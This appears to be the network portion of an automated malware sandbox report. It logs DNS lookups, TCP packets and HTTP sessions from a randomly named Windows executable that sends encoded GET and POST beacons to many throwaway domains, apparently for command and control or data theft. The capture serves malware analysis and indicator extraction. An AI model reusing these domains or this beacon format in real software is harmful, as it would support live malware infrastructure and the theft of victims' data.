                                                                        Nov 28, 2024 09:16:43.984150887 CET5002480192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:44.217026949 CET5002480192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:45.237402916 CET5002580192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:45.357377052 CET8050025161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:45.357470036 CET5002580192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:45.385179043 CET5002580192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:45.505238056 CET8050025161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:45.505254030 CET8050025161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:46.601273060 CET8050025161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:46.601397991 CET8050025161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:46.603797913 CET5002580192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:46.681910038 CET8050025161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:46.682034016 CET5002580192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:46.888840914 CET5002580192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:47.907850027 CET5002680192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:48.028002024 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:48.028162956 CET5002680192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:48.036974907 CET5002680192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:48.157043934 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:49.317785025 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:49.317852020 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:49.317867041 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:49.317982912 CET5002680192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:49.318216085 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:49.318232059 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:49.318252087 CET5002680192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:49.318273067 CET5002680192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:49.323235989 CET5002680192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:49.443244934 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:55.096431971 CET5002780192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:55.216461897 CET805002775.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:16:55.216543913 CET5002780192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:55.232443094 CET5002780192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:55.352555990 CET805002775.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:16:56.359009981 CET805002775.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:16:56.364696980 CET5002780192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:56.748333931 CET5002780192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:56.868422985 CET805002775.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:16:57.766808033 CET5002880192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:57.886887074 CET805002875.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:16:57.886985064 CET5002880192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:57.901714087 CET5002880192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:58.021796942 CET805002875.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:16:58.982846975 CET805002875.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:16:58.982904911 CET5002880192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:59.405328989 CET5002880192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:59.525397062 CET805002875.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:00.424679041 CET5002980192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:00.544770002 CET805002975.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:00.547096014 CET5002980192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:00.562285900 CET5002980192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:00.682440996 CET805002975.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:00.682457924 CET805002975.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:01.737070084 CET805002975.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:01.737260103 CET5002980192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:02.079713106 CET5002980192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:02.199908018 CET805002975.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:03.105755091 CET5003080192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:03.230535030 CET805003075.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:03.230614901 CET5003080192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:03.241503000 CET5003080192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:03.362236023 CET805003075.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:04.372782946 CET805003075.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:04.372929096 CET805003075.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:04.373017073 CET5003080192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:04.379429102 CET5003080192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:04.499381065 CET805003075.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:10.332314014 CET5003180192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:10.452425957 CET805003113.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:17:10.452539921 CET5003180192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:10.467845917 CET5003180192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:10.587856054 CET805003113.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:17:11.553766966 CET805003113.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:17:11.556796074 CET5003180192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:11.990092039 CET5003180192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:12.110240936 CET805003113.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:17:13.391645908 CET5003280192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:13.511795998 CET805003213.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:17:13.511893034 CET5003280192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:13.527771950 CET5003280192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:13.647803068 CET805003213.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:17:14.658343077 CET805003213.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:17:14.660402060 CET5003280192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:15.029489040 CET5003280192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:15.149465084 CET805003213.248.169.48192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                        Nov 28, 2024 09:15:22.413882017 CET1.1.1.1192.168.2.50xb86fNo error (0)www.zrinorem-srumimit.sbs104.21.38.113A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:15:37.847088099 CET1.1.1.1192.168.2.50xd076No error (0)www.6822662.xyz103.249.106.91A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:15:54.205032110 CET1.1.1.1192.168.2.50x72b8No error (0)www.lingdianyun29.xyz121.43.155.35A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:16:09.599001884 CET1.1.1.1192.168.2.50x914aNo error (0)www.learnnow.info199.192.23.123A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:16:24.758555889 CET1.1.1.1192.168.2.50x2d9eNo error (0)www.carpentry.club52.60.87.163A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:16:39.891660929 CET1.1.1.1192.168.2.50x41cNo error (0)www.030002449.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:16:55.093492031 CET1.1.1.1192.168.2.50x1dd7No error (0)www.innovationpulse.tech75.2.103.23A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:17:10.069999933 CET1.1.1.1192.168.2.50xfa54No error (0)www.hasan.cloud13.248.169.48A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:17:10.069999933 CET1.1.1.1192.168.2.50xfa54No error (0)www.hasan.cloud76.223.54.146A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49772 | 185.106.208.3 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:13:50.858181953 CET | 541 | OUT | GET /cs9k/?QhKxhNP=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gpP2tZDtQplym5WCIjSXUngUJeAz/nR33NA1XQvWBI8EpRg==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.holytur.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 28, 2024 09:13:52.244767904 CET | 304 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:13:51 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Length: 146
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49809 | 162.0.215.33 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:14:08.244015932 CET | 823 | OUT | POST /30le/ HTTP/1.1
                                                                        Host: www.nieuws-july202488.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.nieuws-july202488.sbs
                                                                        Referer: http://www.nieuws-july202488.sbs/30le/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Ascii: QhKxhNP=uFsbYKxiJxYpgJe5dXEFpE2IgPXGny2xyu51PXSdhFkIjzb0OT6+Lll5m5UYzQBqf6kNROUavV7sOobhimK0eknIAk+il6aenMIv8dPC12JNep062/p5LYteoniDVl15gEgDyEl+28AXQo32u0HzSKoxyrQq8fbCSuER4VjesoVLlLDtEgCYv4BqAFJ4o/oGuXDRL7Q=
Nov 28, 2024 09:14:09.541932106 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        content-encoding: gzip
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 28 Nov 2024 08:14:09 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49818 | 162.0.215.33 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:14:10.903834105 CET | 843 | OUT | POST /30le/ HTTP/1.1
                                                                        Host: www.nieuws-july202488.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.nieuws-july202488.sbs
                                                                        Referer: http://www.nieuws-july202488.sbs/30le/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Ascii: QhKxhNP=uFsbYKxiJxYphti5YwoFuk2L8fXGsS29yu11PTLYhz0IjRz0PXm+Mll5sZURuABbf64FRP4avV/sOprh+AC3dUnGNE+gh6aenMIv8dbo12RNfYE6kup4IYtZvniDRl19gEgbyGcr26EXQpH2uFH0LaoN4LR1sdWST/gwl1Ovw4FBtdyHeCKw8YtSQWBP5PJv00ThVsHJ1J2trgnayEbLI9Sz7MR+
Nov 28, 2024 09:14:12.421308994 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        content-encoding: gzip
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 28 Nov 2024 08:14:12 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49825 | 162.0.215.33 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:14:13.574978113 CET | 1860 | OUT | POST /30le/ HTTP/1.1
                                                                        Host: www.nieuws-july202488.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.nieuws-july202488.sbs
                                                                        Referer: http://www.nieuws-july202488.sbs/30le/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 28, 2024 09:14:14.957858086 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        content-encoding: gzip
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 28 Nov 2024 08:14:14 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49831 | 162.0.215.33 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:14:16.226296902 CET | 551 | OUT | GET /30le/?QhKxhNP=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+CHSERWGJqvHJseYAxerz13ZcR6Qaw8dlP7tGoG6xZXENiQ==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.nieuws-july202488.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:14:17.485291958 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        date: Thu, 28 Nov 2024 08:14:17 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        5 | 192.168.2.5 | 49847 | 104.18.73.116 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:14:23.252281904 CET | 799 | OUT | POST /s15n/ HTTP/1.1
                                                                        Host: www.losmason.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.losmason.shop
                                                                        Referer: http://www.losmason.shop/s15n/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:14:24.466510057 CET | 565 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 28 Nov 2024 08:14:24 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Location: https://www.losmason.shop/s15n/
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Set-Cookie: __cf_bm=C1pllo1AaAyIRQhUKZP7QgT7_DhqlC4a.bZQZdfoyTU-1732781664-1.0.1.1-xeekNEKNVssY_53bE044bJsiIansZGRLaSQnDTeSQtUvdkQk05TZe4xgGfk8fXsuPOvBTBg1IokNRyQr7.yB2w; path=/; expires=Thu, 28-Nov-24 08:44:24 GMT; domain=.www.losmason.shop; HttpOnly
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e7795886421c-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        6 | 192.168.2.5 | 49852 | 104.18.73.116 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:14:25.920182943 CET | 819 | OUT | POST /s15n/ HTTP/1.1
                                                                        Host: www.losmason.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.losmason.shop
                                                                        Referer: http://www.losmason.shop/s15n/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:14:27.131989002 CET | 565 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 28 Nov 2024 08:14:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Location: https://www.losmason.shop/s15n/
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Set-Cookie: __cf_bm=8rjfd1uH4ls1.DBWCn7wq54ZZVcAbVJISo9JahFpNUY-1732781666-1.0.1.1-OaGxq_Ncwk1pusH6nOuZBVJquc2Bs5lfeFpzDjHhJucfF5PrcoNPknnNUCZIcFZEY84PhtlgSNIvoszCdmO8Xw; path=/; expires=Thu, 28-Nov-24 08:44:26 GMT; domain=.www.losmason.shop; HttpOnly
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e789f9530f41-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        7 | 192.168.2.5 | 49859 | 104.18.73.116 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:14:28.590991020 CET | 1836 | OUT | POST /s15n/ HTTP/1.1
                                                                        Host: www.losmason.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.losmason.shop
                                                                        Referer: http://www.losmason.shop/s15n/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:14:29.851568937 CET | 565 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 28 Nov 2024 08:14:29 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Location: https://www.losmason.shop/s15n/
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Set-Cookie: __cf_bm=79GNL7qBjZ1HFD3zF3vWe0YbT6oOA0lWQ3wWmRFt3ug-1732781669-1.0.1.1-Rly96edvW6YqPhW0_HLr7_3PgShU_wAfVMPTtz6mRMDFNQVRVG2e7Sr3YXKq1v5OJAB7ffkk6u6W.DAz.hzE9g; path=/; expires=Thu, 28-Nov-24 08:44:29 GMT; domain=.www.losmason.shop; HttpOnly
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e79afbe24407-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        8 | 192.168.2.5 | 49866 | 104.18.73.116 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:14:31.239773035 CET | 543 | OUT | GET /s15n/?QhKxhNP=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3MQRZc2DBo1D75Es8xJLJq3ZosxOeO3P23AwVQ3aXA==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.losmason.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:14:32.413784027 CET | 721 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 28 Nov 2024 08:14:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Location: https://www.losmason.shop/s15n/?QhKxhNP=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3MQRZc2DBo1D75Es8xJLJq3ZosxOeO3P23AwVQ3aXA==&Yby=d2ydCtHpb8
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Set-Cookie: __cf_bm=MqclvvysC9ygRf26G1VadZ0gddqDfvUJRXirjWimmKc-1732781672-1.0.1.1-di1y49ge.tufH9SXqcoSag6iWbWluLsRvlH7Jq7gPnMENGDS6t3EcsxNp4lOUQja.ZbLpZQKIitoFaXbCa5tCQ; path=/; expires=Thu, 28-Nov-24 08:44:32 GMT; domain=.www.losmason.shop; HttpOnly
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e7ab08ee8cc5-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        9 | 192.168.2.5 | 49882 | 192.185.147.100 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 28, 2024 09:14:38.398060083 CET | 796 | OUT | POST /yf1h/ HTTP/1.1
                                                                        Host: www.hayaniya.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.hayaniya.org
                                                                        Referer: http://www.hayaniya.org/yf1h/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:14:39.920085907 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:14:39 GMT
                                                                        Server: Apache
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Transfer-Encoding: chunked
                                                                        Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49888 | 192.185.147.100 | 80 | 2848 | C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 09:14:41.058192015 CET | 816 | OUT | POST /yf1h/ HTTP/1.1
                                                                        Host: www.hayaniya.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.hayaniya.org
                                                                        Referer: http://www.hayaniya.org/yf1h/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
